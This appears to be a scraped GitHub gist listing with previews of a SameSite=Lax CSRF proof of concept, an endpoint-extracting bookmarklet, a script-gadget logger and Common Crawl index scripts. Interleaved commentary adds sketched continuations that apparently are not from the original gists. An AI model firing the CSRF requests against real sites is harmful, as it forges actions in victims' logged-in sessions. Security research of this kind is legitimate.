JorianWoltjer / csrf_multiple_forms.html
Last active July 11, 2025 22:09
PoCs for CSRF with multiple SameSite=Lax requests (https://x.com/J0R1AN/status/1842139861295169836)
<body></body>
<script>
  (async () => {
    const target = "https://XXX.ngrok-free.app";
    // Warmup
    await fetch(target, {
      mode: "no-cors",
      credentials: "include",
    });
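The preview ends after the warmup request. As a rough, hedged sketch of the general idea (not the gist's actual continuation), multiple SameSite=Lax requests can be fired by making each one a top-level navigation; the endpoints below are placeholders:

<script>
  // Hypothetical sketch, not the gist's code: each window.open() is a top-level
  // navigation, and SameSite=Lax cookies are attached to top-level GET navigations
  // (and to POSTs only within Chrome's ~2-minute "Lax+POST" grace period).
  const target = "https://XXX.ngrok-free.app";
  const paths = ["/action1", "/action2", "/action3"]; // placeholder endpoints
  for (const path of paths) {
    window.open(target + path, "_blank");
  }
</script>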
javascript: (function() {
  var scripts = document.getElementsByTagName("script"),
    regex = /(?<=(\"|\%27|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\%60))/g;
  const results = new Set;
  for (var i = 0; i < scripts.length; i++) {
    var t = scripts[i].src;
    "" != t && fetch(t).then(function(t) {
      return t.text()
    }).then(function(t) {
      var e = t.matchAll(regex);
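The bookmarklet is cut off mid-loop. A self-contained sketch of the same endpoint-extraction idea (an assumption, not the original's remaining code) that can be pasted into a browser console:

(async () => {
  // Extract relative paths from every external script loaded by the page
  const regex = /(?<=(\"|\%27|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\%60))/g;
  const results = new Set();
  for (const script of document.scripts) {
    if (!script.src) continue;
    const body = await fetch(script.src).then(r => r.text());
    for (const match of body.matchAll(regex)) {
      results.add(match[0]);
    }
  }
  console.log([...results].join("\n"));
})();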
fransr / logger.js
Last active July 17, 2025 13:47
logger.js for hunting script gadgets. More info about script gadgets: https://github.com/google/security-research-pocs/tree/master/script-gadgets (Sebastian Lekies / Eduardo Vela Nava / Krzysztof Kotowicz)
var logger = console.trace;
// ELEMENT
;(getElementByIdCopy => {
  Element.prototype.getElementById = function(q) {
    logger('getElementById', q, this, this.innerHTML);
    return Reflect.apply(getElementByIdCopy, this, [q])
  }
})(Element.prototype.getElementById)
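The same IIFE wrapping pattern extends to any DOM API worth instrumenting. Since getElementById is actually defined on Document.prototype in browsers rather than Element.prototype, a hook there is a natural companion; the sketch below is an illustrative addition, not part of the gist preview, and reuses the logger defined above:

// DOCUMENT
;(getElementByIdCopy => {
  Document.prototype.getElementById = function(q) {
    logger('getElementById', q, this);
    return Reflect.apply(getElementByIdCopy, this, [q])
  }
})(Document.prototype.getElementById)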
Smerity / fetch_page.py
Created August 7, 2015 21:30
An example of fetching a page from Common Crawl using the Common Crawl Index
import gzip
import json
import requests

try:
    from cStringIO import StringIO
except:
    from StringIO import StringIO

# Let's fetch the Common Crawl FAQ using the CC index
resp = requests.get('http://index.commoncrawl.org/CC-MAIN-2015-27-index?url=http%3A%2F%2Fcommoncrawl.org%2Ffaqs%2F&output=json')
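The preview stops at the index lookup. Continuing from resp above, a hedged sketch of the usual next step (not necessarily the gist's remaining code): each line of the index response is a JSON record whose filename, offset and length locate the gzipped WARC record, which a Range request can fetch directly. The data URL below is the current Common Crawl endpoint and is an assumption here:

# Parse the first index record and pull just that WARC record via a Range request
record = json.loads(resp.text.strip().split('\n')[0])
offset, length = int(record['offset']), int(record['length'])
data_url = 'https://data.commoncrawl.org/' + record['filename']
headers = {'Range': 'bytes={}-{}'.format(offset, offset + length - 1)}
raw = requests.get(data_url, headers=headers).content
# The record is gzip-compressed; decompress it (Python 2 style, matching the imports above)
print(gzip.GzipFile(fileobj=StringIO(raw)).read())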
Smerity / get_all_urls.py
Created June 23, 2015 01:05
Collect all URLs for NYTimes in the Common Crawl URL Index
import requests
show_pages = 'http://index.commoncrawl.org/CC-MAIN-2015-18-index?url={query}&output=json&showNumPages=true'
get_page = 'http://index.commoncrawl.org/CC-MAIN-2015-18-index?url={query}&output=json&page={page}'
query = 'nytimes.com/*'
show = requests.get(show_pages.format(query=query))
pages = show.json()['pages']
results = set()
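The preview ends before the paging loop. A hedged sketch of how the collection likely proceeds (not the gist's exact code), walking every index page and recording each unique URL:

import json  # needed to parse the index's JSON lines (not shown in the preview)

for page in range(pages):
    resp = requests.get(get_page.format(query=query, page=page))
    for line in resp.text.splitlines():
        if line:
            results.add(json.loads(line)['url'])

print('Total unique URLs: {}'.format(len(results)))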